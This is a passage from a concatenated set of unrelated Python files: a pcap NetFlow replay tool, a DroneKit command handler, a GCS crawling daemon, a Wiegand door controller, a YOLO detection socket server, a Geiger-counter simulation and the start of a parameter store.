packets = rdpcap(self.file_path)
ps = []
for packet in packets:
# confirm the packet is cflow or sflow
if packet.getlayer('Netflow Header'):
version = packet.getlayer('Netflow Header').fields['version']
# confirm the version is v5 or v9
if version in [5, 9]:
layer = packet.getlayer('Netflow Header')
layer.__delattr__('sysUptime')
layer.__delattr__('unixSecs')
# UDP packet
# pkt = Ether(dst=self.remote_mac_address) / IP(
# dst=self.remote_ip_address) / UDP(dport=self.remote_port)
# ICMP packet
# pkt = IP(self.remote_ip_address) / ICMP()
# NetFlow packet
pkt = IP(dst=self.remote_ip_address) / UDP(dport=self.remote_cflow_port) / packet.getlayer('Netflow Header')
ps.append(pkt)
# rewrite addresses and resend the packet as-is (the missing IP-version operand in the
# original line is assumed to be 4, i.e. IPv4)
if packet.getlayer('IP').fields['version'] == 4 and packet.getlayer('Netflow Header').fields['version'] == 0:
pkt = packet.copy()
pkt.getlayer('IP').fields['src'] = self.local_ip_address
pkt.getlayer('IP').fields['dst'] = self.remote_ip_address
pkt.getlayer('Ether').fields['dst'] = self.remote_mac_address
ps.append(pkt)
return ps
def pyshark_extractor(self):
""" 使用pyshark获取包,但因为难以重新整理,该功能废除,仅能作为读取分析使用
:return: pyshark读取的sflow与cflow数据包的列表
"""
import pyshark
packets = pyshark.FileCapture(self.file_path)
idx = 0
for packet in packets:
if 'sflow' in dir(packet):
idx = self._make_data('sflow', packet, idx)
if 'cflow' in dir(packet):
idx = self._make_data('cflow', packet, idx)
packets.close()
return self.pyshark_data
def _make_data(self, name, packet, idx):
""" 配合pyshark获取包,挖掘udp中的payload """
if 'data' in dir(packet.layers[-1]):
idx += 1
self.pyshark_data.append([layer.binary_value
for layer in packet.layers[-1].pyshark_data.all_fields])
# self.data.append(b''.join([layer.binary_value
# for layer in packet.layers[-1].data.all_fields]))
time.sleep(0.5)
return idx
def get_local_mac_address(self):
""" 获取本地mac地址 """
import uuid
mac = uuid.UUID(int=uuid.getnode()).hex[-12:]
return ":".join([mac[e:e + 2] for e in range(0, 11, 2)])
def get_local_ip_address(self):
""" 获取本地IP地址 """
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('8.8.8.8', 80))
ip = s.getsockname()[0]
s.close()
return ip
def get_local_ipv6(self):
""" 获取本地ipv6的地址,但是会出错,尽可能人工写入 """
import socket
ipv6 = ''
groups = socket.getaddrinfo(socket.gethostname(), None)
for group in groups:
if group[0].name == 'AF_INET6':
ipv6 = group[4][0]
break
return ipv6
def get_handler_config():
filepath = os.path.dirname(__file__)
path = os.path.join(filepath, 'config.yaml')
with open(path, 'r', encoding='utf-8') as f:
conf = yaml.load(f.read(), Loader=yaml.FullLoader)
return conf
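# A hypothetical config.yaml layout, inferred from the keys read here and in __main__
# (every field name below comes from an access in this file; the values are made up):
#
# server:
#   pcap_file: ./capture.pcap
#   workers: 4
#   number: 1
# remote_info:
#   remote_mac_address: "00:11:22:33:44:55"
#   remote_ip_address: "10.0.107.61"
#   remote_port: 9996
#   remote_cflow_port: 9996
#   remote_sflow_port: 6343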
def scapy_send_package(number, worker, pkts):
""" 为多线程创建的发包函数 """
idx = 1
while True:
for j in range(len(pkts)):
send(pkts[j])
idx += 1
if __name__ == '__main__':
# logger = get_logger()
# logger.info('PCAP Replay starts!')
try:
# load the config and extract the packets
config = get_handler_config()
remote_info = config.get('remote_info')
if remote_info:
port = remote_info.get('remote_port')
if port:
remote_info['remote_port'] = int(port)
extractor = PcapFileExtractor(config.get('server').get('pcap_file'), remote_info)
pkts = extractor.scapy_extractor()
# get the number of worker threads and the server number
workers = config.get('server').get('workers')
number = config.get('server').get('number')
# send with multiple threads
threads = []
for i in range(workers):
t = threading.Thread(target=scapy_send_package, args=(number, i+1, pkts))
threads.append(t)
for i in range(workers):
threads[i].start()
for i in range(workers):
threads[i].join()
except Exception as e:
print(e.__repr__())
print("Failed to activate threads.")
# logger.info('Failed to activate threads.')
# send UDP packets with a plain socket
# udp = UDPServer(logger)
# while True:
# udp.send([b'hello'])
# for value in data:
# udp.send(value)
|
droneAPI.py
|
#!/usr/bin/env python
import math
import json
import Queue
import threading
FRAME_LOCAL_NED = 1
MAV_CMD_CONDITION_YAW = 115
MAV_CMD_DO_SET_ROI = 201
downloaded = False
q = Queue.Queue()
def print_json():
while True:
msg = q.get()
print(json.dumps(msg))
t = threading.Thread(target=print_json,args=())
t.daemon = True
t.start()
def attribute_callback(self,attr_name,value):
if value != None:
if attr_name == 'location.global_frame':
q.put({ 'gpsCoords':{ 'lat':value.lat, 'long':value.lon, 'alt':value.alt }})
elif attr_name == 'attitude':
q.put({ 'attitude':{ 'value':{'pitch':value.pitch, 'yaw':value.yaw, 'roll':value.roll }}})
elif attr_name == 'mode': q.put({ 'modeName':value.name })
elif attr_name == 'armed': q.put({ 'isArmed':value })
def send_ned_velocity(vehicle,vn,ve,vd):
msg = vehicle.message_factory.set_position_target_local_ned_encode(0,0,0,FRAME_LOCAL_NED,0b0000111111000111,0,0,0,vn,ve,vd,0,0,0,0,0)
vehicle.send_mavlink(msg)
def condition_yaw(vehicle,heading):
msg = vehicle.message_factory.command_long_encode(0,0,MAV_CMD_CONDITION_YAW,0,heading,0,1,0,0,0,0)
vehicle.send_mavlink(msg)
def set_roi(vehicle,latitude,longitude,altitude):
msg = vehicle.message_factory.command_long_encode(0,0,MAV_CMD_DO_SET_ROI,0,0,0,0,0,latitude,longitude,altitude)
vehicle.send_mavlink(msg)
def process_command(command,vehicle):
global downloaded
x = command.split()
if x[0] == "arm": vehicle.armed = True
# elif x[0] == "getAttitude":
# if vehicle.attitude == None: q.put({ 'attitude':{ 'value':None }})
# else: q.put({ 'attitude':{ 'value':{ 'pitch':vehicle.attitude.pitch, 'yaw':vehicle.attitude.yaw, 'roll':vehicle.attitude.roll }}})
elif x[0] == "getGimbal":
if vehicle.gimbal == None: q.put({ 'gimbal':{ 'value':None }})
else: q.put({ 'gimbal':{ 'value':vehicle.gimbal.pitch }})
elif x[0] == "getHomeLocation":
if not downloaded:
cmds = vehicle.commands
cmds.download()
cmds.wait_ready()
downloaded = True
if vehicle.home_location == None: q.put({ 'homeLocation':{ 'value':None }})
else: q.put({ 'homeLocation':{ 'value':{ 'lat':vehicle.home_location.lat, 'long':vehicle.home_location.lon, 'alt':vehicle.home_location.alt }}})
elif x[0] == "getVelocity":
if vehicle.velocity == None: q.put({ 'velocity':{ 'value':None }})
else: q.put({ 'velocity':{ 'value':vehicle.velocity }})
elif x[0] == "goto":
coord_lat = float(x[1])
coord_long = float(x[2])
coord_alt = float(x[3])
speed = float(x[4])
cmd_str = "goto " + str(coord_lat) + " " + str(coord_long) + " " + str(coord_alt) + " " + str(speed)
q.put({ 'cmd':cmd_str })
a_location = dronekit.LocationGlobal(coord_lat,coord_long,coord_alt)
vehicle.simple_goto(a_location,groundspeed=speed)
elif x[0] == "guided":
vehicle.mode = dronekit.VehicleMode("GUIDED")
q.put({ 'cmd':'guided' })
elif x[0] == "launch":
q.put({ 'cmd':'takeoff' })
vehicle.simple_takeoff(10)
elif x[0] == "loiter":
vehicle.mode = dronekit.VehicleMode("LOITER")
q.put({ 'cmd':'loiter' })
elif x[0] == "mode":
q.put({ 'modeName':vehicle.mode.name })
elif x[0] == "rotateGimbal":
pitch = float(x[1])
yaw = vehicle.attitude.yaw
cmd_str = "gimbal (" + str(pitch) + "," + str(yaw) + ")"
if yaw is not None and not math.isnan(yaw) and not math.isnan(pitch): vehicle.gimbal.rotate(pitch,0,yaw)
q.put({ 'cmd':cmd_str })
elif x[0] == "rtl":
vehicle.mode = dronekit.VehicleMode("RTL")
q.put({ 'cmd':'rtl' })
elif x[0] == "setROI":
latitude = float(x[1])
longitude = float(x[2])
altitude = float(x[3])
cmd_str = "roi " + str(latitude) + " " + str(longitude) + " " + str(altitude)
q.put({ 'cmd':cmd_str })
if not math.isnan(latitude) and not math.isnan(longitude) and not math.isnan(altitude): set_roi(vehicle,latitude,longitude,altitude)
elif x[0] == "setVelocity":
vn = float(x[1])
ve = float(x[2])
vd = float(x[3])
cmd_str = "velocity " + str(vn) + " " + str(ve) + " " + str(vd)
q.put({ 'cmd':cmd_str })
if not math.isnan(vn) and not math.isnan(ve) and not math.isnan(vd): send_ned_velocity(vehicle,vn,ve,vd)
elif x[0] == "setYaw":
heading = float(x[1])
cmd_str = "yaw " + str(heading)
q.put({ 'cmd':cmd_str })
if not math.isnan(heading): condition_yaw(vehicle,heading)
elif x[0] == "stabilize":
vehicle.mode = dronekit.VehicleMode("STABILIZE")
q.put({ 'cmd':'stabilize' })
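# Example command strings accepted by process_command (coordinates and values are illustrative):
#   "arm"
#   "guided"
#   "launch"
#   "goto 37.7749 -122.4194 30 5"      # lat lon alt groundspeed
#   "setVelocity 1.0 0.0 0.0"          # north east down (m/s)
#   "setYaw 90"
#   "rtl"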
# Connect to UDP endpoint (and wait for default attributes to accumulate)
def main():
target = "udpin:0.0.0.0:14550"
vehicle = dronekit.connect(target)
q.put({ 'isConnected':True })
vehicle.add_attribute_listener('location.global_frame',attribute_callback)
vehicle.add_attribute_listener('mode',attribute_callback)
vehicle.add_attribute_listener('armed',attribute_callback)
vehicle.add_attribute_listener('attitude',attribute_callback)
while 1:
line = ""
for c in raw_input():
line = line + c
process_command(line,vehicle)
vehicle.close()
try:
import dronekit
import sys
main()
except ImportError:
q.put({ 'isConnected':False })
|
main.py
|
# Standard
import hashlib
import os
import sys
import importlib
import json
import threading
import time
from urllib import parse
import io
import zipfile
from datetime import datetime
# Additional
import flask
import urllib3
import certifi
from google.cloud import firestore
from google.cloud import storage as firestorage
# global variable
access_counter = 0
# application
with open(os.path.join(os.path.dirname(__file__), "config.json"), "r", encoding="utf-8") as fp:
try: # on CaaS
wsgi_h = importlib.import_module("wsgi_h")
db = wsgi_h.db
DELETE_FIELD = wsgi_h.DELETE_FIELD
storage = wsgi_h.GCS.get_bucket(json.load(fp)["GCS_bucket"])
except: # on FaaS
db = firestore.Client()
DELETE_FIELD = firestore.DELETE_FIELD
storage = firestorage.Client().get_bucket(json.load(fp)["GCS_bucket"])
def deamon():
start_timestamp: int = int(datetime.now().timestamp()*1000)
# DB layer
docRefs = db.collection('nicoapi').list_documents()
for docRef in docRefs:
recodes: dict = docRef.get().to_dict()
# Document layer
# no records, no document
if len(recodes) < 1:
docRef.delete()
continue
for tsuid, order in recodes.items():
# 7days to delete
if int(datetime.now().timestamp()*1000) > int(tsuid.split("_")[0])+604800000:
recodes[tsuid] = DELETE_FIELD
if storage.blob("nicoapi/"+docRef.id + "/"+tsuid + ".zip").exists() == True:
storage.blob("nicoapi/"+docRef.id + "/" +
tsuid + ".zip").delete()
continue
# if the downloaded data no longer exists on GCS, delete the record
if recodes[tsuid]["status"] == "processed":
if storage.blob("nicoapi/"+docRef.id + "/"+tsuid + ".zip").exists() == False:
recodes[tsuid] = DELETE_FIELD
continue
with io.BytesIO() as inmemory_zip:
# set https UserAgent
https = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where(
), headers={"User-Agent": order["User-Agent"]})
# start Crawl
for url in order["request_urls"]:
print(hashlib.md5(url.encode('utf-8')).hexdigest())
time.sleep(3)
try:
resp_json = https.request('GET', parse.quote(
url, safe="=&-?:/%")).data.decode('utf-8')
with zipfile.ZipFile(inmemory_zip, 'a', compression=zipfile.ZIP_DEFLATED) as zf:
zf.writestr(hashlib.md5(url.encode(
'utf-8')).hexdigest(), json.dumps(resp_json, ensure_ascii=False))
storage.blob("nicoapi/"+docRef.id + "/"+tsuid +
".zip").upload_from_string(inmemory_zip.getvalue())
except:
pass
recodes[tsuid]["status"] = "processed"
docRef.set(recodes, merge=True)
# prevent high-frequency restarts
while int(datetime.now().timestamp()*1000) < start_timestamp+3000:
time.sleep(1)
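# Illustrative shape of one document in the 'nicoapi' collection (field names come from the
# accesses above; the values and the non-"processed" status string are made up):
# {
#   "1714000000000_abcd": {
#     "status": "requested",           # anything other than "processed" triggers a crawl
#     "User-Agent": "example-agent/1.0",
#     "request_urls": ["https://example.com/api?page=1"]
#   }
# }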
thread_d = threading.Thread(name='nicoapi_d', target=deamon)
def show(request):
# head ← (template)
global access_counter
access_counter += 1
status_dict: dict = {
"access_counter": str(access_counter),
"Thread": "Running", }
# body
global thread_d
if thread_d.is_alive() == False:
thread_d = threading.Thread(name='nicoapi_d', target=deamon)
thread_d.start()
status_dict["thread"] = "start"
if request.method == "POST":
return json.dumps(status_dict, ensure_ascii=False), 200
# foot ← (template)
status_lines: str = "<h6 class='text-center'>==STATUS==</h6>"
for key, value in status_dict.items():
status_lines += "<div class='text-center' >" + key+": "+value+"</div>"
kwargs = {"STATUS_LINES": status_lines}
with open(os.path.join(os.path.dirname(__file__), "main.html"), "r", encoding="utf-8") as f:
html = f.read()
for kw, arg in kwargs.items():
html = html.replace("{{"+kw+"}}", arg)
return flask.render_template_string(html)
return "404: nof found → main.html", 404
|
__init__.py
|
import logging
import threading
import requests
import time
from .wiegand import Decoder
logging.basicConfig(level=logging.DEBUG)
class Main:
def __init__(self, api_user, api_key):
self.cards = {}
self.force_sync_now = threading.Event()
self.session = requests.Session()
self.session.auth = (api_user, api_key)
self.sync_cards()
logging.info("Running")
self.wiegand = Decoder(self.wiegand_callback)
self.notify_thread = threading.Thread(target=self.listen_notification, daemon=True)
self.notify_thread.start()
self.auto_sync_loop()
def sync_cards(self):
logging.info("Downloading users list")
r = self.session.get("http://127.0.0.1:8080/api/v1/cards")
users = r.json()["keycards"]
cards = {}
for user in users:
cards[user["card_uid"].strip()] = user
self.cards = cards
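# Expected response shape (illustrative; only the "keycards" list and each entry's "card_uid"
# are actually read by this code, other fields such as "name" are hypothetical):
#   {"keycards": [{"card_uid": "0006821881", "name": "..."}]}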
def wiegand_callback(self, bits, value):
print("bits", bits, "value", value)
u = self.cards.get(value)
if u:
print("user", u)
self.wiegand.open_door()
def listen_notification(self):
while 1:
try:
r = requests.get("https://wut.ee/notify/abc",
headers={"Connection": "close"},
timeout=60)
logging.debug("Got notification: %s", r.text)
self.force_sync_now.set()
except requests.Timeout as e:
logging.debug("notification timeout")
time.sleep(0.1)
def auto_sync_loop(self):
while 1:
try:
self.force_sync_now.wait(60*10) # == 10min
self.force_sync_now.clear()
self.sync_cards()
except KeyboardInterrupt as e:
self.wiegand.cancel()
break
|
darknet4.py
|
#!python3
'''
##############################
### Receive Video stream #####
### from Android client #######
### Use yolo to do detect ####
## (return a message to the mobile device) ##
##############################
'''
from ctypes import *
import math
import random
import os
import socket
import time
import cv2
import numpy as np
from PIL import Image
import sys
import pickle
import struct
import timeit
import time
import threading
import Queue
import ctypes
# generate different colors for different classes
COLORS = np.random.uniform(0, 255, size=(80,3))
def sample(probs):
s = sum(probs)
probs = [a/s for a in probs]
r = random.uniform(0, 1)
for i in range(len(probs)):
r = r - probs[i]
if r <= 0:
return i
return len(probs)-1
def c_array(ctype, values):
arr = (ctype*len(values))()
arr[:] = values
return arr
class BOX(Structure):
_fields_ = [("x", c_float),
("y", c_float),
("w", c_float),
("h", c_float)]
class DETECTION(Structure):
_fields_ = [("bbox", BOX),
("classes", c_int),
("prob", POINTER(c_float)),
("mask", POINTER(c_float)),
("objectness", c_float),
("sort_class", c_int)]
class IMAGE(Structure):
_fields_ = [("w", c_int),
("h", c_int),
("c", c_int),
("data", POINTER(c_float))]
class METADATA(Structure):
_fields_ = [("classes", c_int),
("names", POINTER(c_char_p))]
lib = CDLL("/home/nano/darknet/libdarknet.so", RTLD_GLOBAL)
lib.network_width.argtypes = [c_void_p]
lib.network_width.restype = c_int
lib.network_height.argtypes = [c_void_p]
lib.network_height.restype = c_int
predict = lib.network_predict
predict.argtypes = [c_void_p, POINTER(c_float)]
predict.restype = POINTER(c_float)
set_gpu = lib.cuda_set_device
set_gpu.argtypes = [c_int]
make_image = lib.make_image
make_image.argtypes = [c_int, c_int, c_int]
make_image.restype = IMAGE
get_network_boxes = lib.get_network_boxes
get_network_boxes.argtypes = [c_void_p, c_int, c_int, c_float, c_float, POINTER(c_int), c_int, POINTER(c_int)]
get_network_boxes.restype = POINTER(DETECTION)
make_network_boxes = lib.make_network_boxes
make_network_boxes.argtypes = [c_void_p]
make_network_boxes.restype = POINTER(DETECTION)
free_detections = lib.free_detections
free_detections.argtypes = [POINTER(DETECTION), c_int]
free_ptrs = lib.free_ptrs
free_ptrs.argtypes = [POINTER(c_void_p), c_int]
network_predict = lib.network_predict
network_predict.argtypes = [c_void_p, POINTER(c_float)]
reset_rnn = lib.reset_rnn
reset_rnn.argtypes = [c_void_p]
load_net = lib.load_network
load_net.argtypes = [c_char_p, c_char_p, c_int]
load_net.restype = c_void_p
do_nms_obj = lib.do_nms_obj
do_nms_obj.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]
do_nms_sort = lib.do_nms_sort
do_nms_sort.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]
free_image = lib.free_image
free_image.argtypes = [IMAGE]
letterbox_image = lib.letterbox_image
letterbox_image.argtypes = [IMAGE, c_int, c_int]
letterbox_image.restype = IMAGE
load_meta = lib.get_metadata
lib.get_metadata.argtypes = [c_char_p]
lib.get_metadata.restype = METADATA
load_image = lib.load_image_color
load_image.argtypes = [c_char_p, c_int, c_int]
load_image.restype = IMAGE
rgbgr_image = lib.rgbgr_image
rgbgr_image.argtypes = [IMAGE]
predict_image = lib.network_predict_image
predict_image.argtypes = [c_void_p, IMAGE, c_int]
predict_image.restype = POINTER(c_float)
#def classify(net, meta, im):
# out = predict_image(net, im)
# res = []
# for i in range(meta.classes):
# res.append((meta.names[i], out[i]))
# res = sorted(res, key=lambda x: -x[1])
# return res
### modified ###
HOST=''
USER_PORT=9004
CTL_PORT=11114
BUFFER_SIZE = 256
QUATO = 100
Interval = 10
Latency = []
Count = 0
def connect_controller():
global QUATO
global Latency
ctl = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
ctl.bind((HOST, CTL_PORT))
ctl.listen(10)
print('Controller Socket now listening')
while True:
controller, ctl_addr = ctl.accept()
print("Get new controller socket" + str(ctl_addr))
while True:
recv_data = controller.recv(ctypes.sizeof(ctypes.c_double)*BUFFER_SIZE)
if len(recv_data) <=0:
break
Latency = []
data = np.fromstring(recv_data, dtype=np.double)
#print(data)
QUATO = int(data[0])
print('GPU virtual resource is ' + str(QUATO))
time.sleep(Interval)
if len(Latency) ==0:
Latency.append(1e-1)
send_data = np.mean(Latency[-5:]) * np.ones(BUFFER_SIZE, dtype=np.double)
controller.sendall(send_data)
def recImage(client,data,q):
frameid = 1
while True:
buf = ''
while len(buf)<4:
buf += client.recv(4-len(buf))
size, = struct.unpack('!i', buf)
#print "receiving %d bytes" % size
while len(data) < size:
data += client.recv(1024)
frame_data = data[:size]
data = data[size:]
imgdata = np.fromstring(frame_data, dtype='uint8')
decimg = cv2.imdecode(imgdata,1)
#q.put(decimg)
#print "frame %d finish offloading" % frameid
#f2 = open('/home/nvidia/Desktop/haoxin/images/newNexus320/320off/datasize320.txt','a')
#print >> f2, "%f" %size
#f2.close()
#if frameid>= 45 and frameid<=50:
# cv2.imwrite("/home/nvidia/Desktop/haoxin/images/newNexus320/320off/image%2d.bmp" %frameid,decimg)
frameid += 1
def recv_image_from_socket(client, data):
buf = ''
while len(buf)<4:
buf += client.recv(4-len(buf))
size, = struct.unpack('!i', buf)
#print "receiving %d bytes" % size
while len(data) < size:
data += client.recv(1024)
frame_data = data[:size]
data = data[size:]
imgdata = np.fromstring(frame_data, dtype='uint8')
decimg = cv2.imdecode(imgdata,1)
return decimg
def detect(net, meta, image, thresh=.5, hier_thresh=.5, nms=.45):
global QUATO
#check if image is an OpenCV frame
if isinstance(image, np.ndarray):
#StartTime0 = time.time()
# GET C,H,W, and DATA values
#print ('1')
img = image.transpose(2, 0, 1)
c, h, w = img.shape[0], img.shape[1], img.shape[2]
nump_data = img.ravel() / 255.0
nump_data = np.ascontiguousarray(nump_data, dtype=np.float32)
# make c_type pointer to numpy array
ptr_data = nump_data.ctypes.data_as(POINTER(c_float))
# make IMAGE data type
im = IMAGE(w=w, h=h, c=c, data=ptr_data)
else:
im = load_image(image, 0, 0)
print ('2')
num = c_int(0)
pnum = pointer(num)
predict_image(net, im, QUATO)
dets = get_network_boxes(net, im.w, im.h, thresh, hier_thresh, None, 0, pnum)
num = pnum[0]
if (nms): do_nms_obj(dets, num, meta.classes, nms);
res = []
for j in range(num):
for i in range(meta.classes):
if dets[j].prob[i] > 0:
b = dets[j].bbox
classid = i
classname = meta.names[i].decode('UTF-8')
res.append((classname, dets[j].prob[i], (b.x, b.y, b.w, b.h),classid))
res = sorted(res, key=lambda x: -x[1])
#free_image(im)
free_detections(dets, num)
return res
# display the pic after detecting
def showPicResult(r,im,frameID):
for i in range(len(r)):
x1=r[i][2][0]-r[i][2][2]/2
y1=r[i][2][1]-r[i][2][3]/2
x2=r[i][2][0]+r[i][2][2]/2
y2=r[i][2][1]+r[i][2][3]/2
color = COLORS[r[i][3]]
cv2.rectangle(im,(int(x1),int(y1)),(int(x2),int(y2)),color,2)
#putText
x3 = int(x1+5)
y3 = int(y1-10)
font = cv2.FONT_HERSHEY_SIMPLEX
text = "{}: {:.4f}".format(str(r[i][0]), float(r[i][1]))
if ((x3<=im.shape[0]) and (y3>=0)):
cv2.putText(im, text, (x3,y3), font, 0.5, color, 1, cv2.LINE_AA)
else:
cv2.putText(im, text, (int(x1),int(y1+6)), font, 0.5, color, 1, cv2.LINE_AA)
#if frameID>= 45 and frameID<=50:
# cv2.imwrite("/home/nvidia/Desktop/haoxin/images/newNexus320/320off/image%3d.bmp" %frameID,im)
cv2.imshow('Detection Window', im)
#cv2.waitKey(0)
#cv2.destroyAllWindows()
if __name__ == "__main__":
t1 = threading.Thread(target = connect_controller)
t1.setDaemon(True)
t1.start()
detect_net = load_net("./cfg/yolov3-608.cfg", "yolov3.weights", 0)
detect_meta = load_meta("cfg/coco.data")
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind((HOST,USER_PORT))
s.listen(10)
client,addr=s.accept()
print ("Get new user socket")
data = b''
frameID = 1
starttime = time.time()
q = Queue.Queue()
#q = Queue.LifoQueue()
#t = threading.Thread(target = recImage,args=(client,data,q))
#t.setDaemon(True)
#t.start()
StartTime = time.time()
while True:
decimg = recv_image_from_socket(client,data)
compTime = time.time()
result = detect(detect_net, detect_meta, decimg, thresh=0.7)
#print('comp: ' + str(time.time() - compTime))
#print('real: ' + str(0.14 + 4.63/(QUATO+0.454)))
str1 = '0'+'\n'
client.sendall(str1.encode())
Latency.append(time.time() - StartTime)
print('round-trip latency is ' + str(time.time() - StartTime))
StartTime = time.time()
|
Geiger_Counter.py
|
"""
Geiger-Müller Counter
Luis Eduardo Sánchez González
Facultad de Ciencias Físico Matemáticas
Computational Physics (Física Computacional)
Sat 01 May 2021 10:12:14 CDT
Repository: https://github.com/Luis2501/Fisica-Computacional-1
"""
import numpy as np
from time import sleep
from random import random
from tkinter import *
import threading
import matplotlib.pyplot as plt
class UI(Frame):
def __init__(self, parent=None, N0=1000, t=100, p=0.01):
Frame.__init__(self, parent)
self.N0, self.t, self.p = N0, t, p
self.parent = parent
self.init_ui()
def init_ui(self):
self.parent.title("Geiger-Müller Counter")
self.N = StringVar()
self.N.set(self.N0)
self.parent.label = Label(font=("Verdana",24))
self.parent.label.pack(padx = 50, pady = 20)
self.parent.label.config(textvariable=self.N)
# run the decay simulation in a background thread so the Tk mainloop stays responsive
self.hilo = threading.Thread(target=self.Decay, daemon=True)
self.parent.iniciar = Button(text = "Start", command = self.hilo.start)
self.parent.iniciar.pack(pady = 20)
def Decay(self):
N0, p, t = self.N0, self.p, self.t
for i in range(t - 1):
for k in range(N0):
if random() < p:
N0 -= 1
self.N.set(N0)
sleep(4)
self.Beep()
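# Each step every remaining nucleus decays with probability p, so on average
# N(t) ≈ N0 * (1 - p)**t; with N0 = 10000, p = 0.01 and t = 100 roughly 3,660 nuclei remain.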
def Beep(self):
print("\a")
if __name__ == "__main__":
root = Tk()
app = UI(parent=root, N0=10000, t=100, p=0.01)
app.mainloop()
|
params.py
|
#!/usr/bin/env python3
"""ROS has a parameter server, we have files.
The parameter store is a persistent key value store, implemented as a directory with a writer lock.
On Android, we store params under params_dir = /data/params. The writer lock is a file
"<params_dir>/.lock" taken using flock(), and data is stored in a directory symlinked to by
"<params_dir>/d".
Each key, value pair is stored as a file with named <key> with contents <value>, located in
<params_dir>/d/<key>
Readers of a single key can just open("<params_dir>/d/<key>") and read the file contents.
Readers who want a consistent snapshot of multiple keys should take the lock.
Writers should take the lock before modifying anything. Writers should also leave the DB in a
consistent state after a crash. The implementation below does this by copying all params to a temp
directory <params_dir>/<tmp>, then atomically symlinking <params_dir>/<d> to <params_dir>/<tmp>
before deleting the old <params_dir>/<d> directory.
Writers that only modify a single key can simply take the lock, then swap the corresponding value
file in place without messing with <params_dir>/d.
"""
import time
import os
import errno
import shutil
import fcntl
import tempfile
import threading
from enum import Enum
from common.basedir import PARAMS
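# Resulting on-disk layout (illustrative, following the module docstring above):
#   <params_dir>/.lock        flock()-based writer lock
#   <params_dir>/d            symlink to the current data directory, swapped atomically on multi-key writes
#   <params_dir>/d/<key>      one file per key, whose contents are the value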
def mkdirs_exists_ok(path):
try:
os.makedirs(path)
except OSError:
if not os.path.isdir(path):
raise
class TxType(Enum):
PERSISTENT = 1
CLEAR_ON_MANAGER_START = 2
CLEAR_ON_PANDA_DISCONNECT = 3
class UnknownKeyName(Exception):
pass
keys = {
"AccessToken": [TxType.CLEAR_ON_MANAGER_START],
"AthenadPid": [TxType.PERSISTENT],
"CalibrationParams": [TxType.PERSISTENT],
"CarBatteryCapacity": [TxType.PERSISTENT],
"CarParams": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarParamsCache": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarVin": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CommunityFeaturesToggle": [TxType.PERSISTENT],
"CompletedTrainingVersion": [TxType.PERSISTENT],
"DisablePowerDown": [TxType.PERSISTENT],
"DisableUpdates": [TxType.PERSISTENT],
"DoUninstall": [TxType.CLEAR_ON_MANAGER_START],
"DongleId": [TxType.PERSISTENT],
"GitBranch": [TxType.PERSISTENT],
"GitCommit": [TxType.PERSISTENT],
"GitRemote": [TxType.PERSISTENT],
"GithubSshKeys": [TxType.PERSISTENT],
"HasAcceptedTerms": [TxType.PERSISTENT],
"HasCompletedSetup": [TxType.PERSISTENT],
"IsDriverViewEnabled": [TxType.CLEAR_ON_MANAGER_START],
"IsLdwEnabled": [TxType.PERSISTENT],
"IsMetric": [TxType.PERSISTENT],
"IsOffroad": [TxType.CLEAR_ON_MANAGER_START],
"IsRHD": [TxType.PERSISTENT],
"IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
"IsUpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"IsUploadRawEnabled": [TxType.PERSISTENT],
"LastAthenaPingTime": [TxType.PERSISTENT],
"LastUpdateTime": [TxType.PERSISTENT],
"LastUpdateException": [TxType.PERSISTENT],
"LiveParameters": [TxType.PERSISTENT],
"OpenpilotEnabledToggle": [TxType.PERSISTENT],
"LaneChangeEnabled": [TxType.PERSISTENT],
"PandaFirmware": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaFirmwareHex": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaDongleId": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Passive": [TxType.PERSISTENT],
"RecordFront": [TxType.PERSISTENT],
"ReleaseNotes": [TxType.PERSISTENT],
"ShouldDoUpdate": [TxType.CLEAR_ON_MANAGER_START],
"SubscriberInfo": [TxType.PERSISTENT],
"TermsVersion": [TxType.PERSISTENT],
"TrainingVersion": [TxType.PERSISTENT],
"UpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"UpdateFailedCount": [TxType.CLEAR_ON_MANAGER_START],
"Version": [TxType.PERSISTENT],
"Offroad_ChargeDisabled": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_ConnectivityNeeded": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_ConnectivityNeededPrompt": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_TemperatureTooHigh": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_PandaFirmwareMismatch": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_InvalidTime": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_NeosUpdate": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_UpdateFailed": [TxType.CLEAR_ON_MANAGER_START],
}
def fsync_dir(path):
fd = os.open(path, os.O_RDONLY)
try:
os.fsync(fd)
finally:
os.close(fd)
class FileLock():
def __init__(self, path, create, lock_ex):
self._path = path
self._create = create
self._fd = None
self._lock_ex = lock_ex
def acquire(self):
self._fd = os.open(self._path, os.O_CREAT if self._create else 0)
fcntl.flock(self._fd, fcntl.LOCK_EX if self._lock_ex else fcntl.LOCK_SH)
def release(self):
if self._fd is not None:
os.close(self._fd)
self._fd = None
class DBAccessor():
def __init__(self, path):
self._path = path
self._vals = None
def keys(self):
self._check_entered()
return self._vals.keys()
def get(self, key):
self._check_entered()
if self._vals is None:
return None
try:
return self._vals[key]
except KeyError:
return None
def _get_lock(self, create, lock_ex):
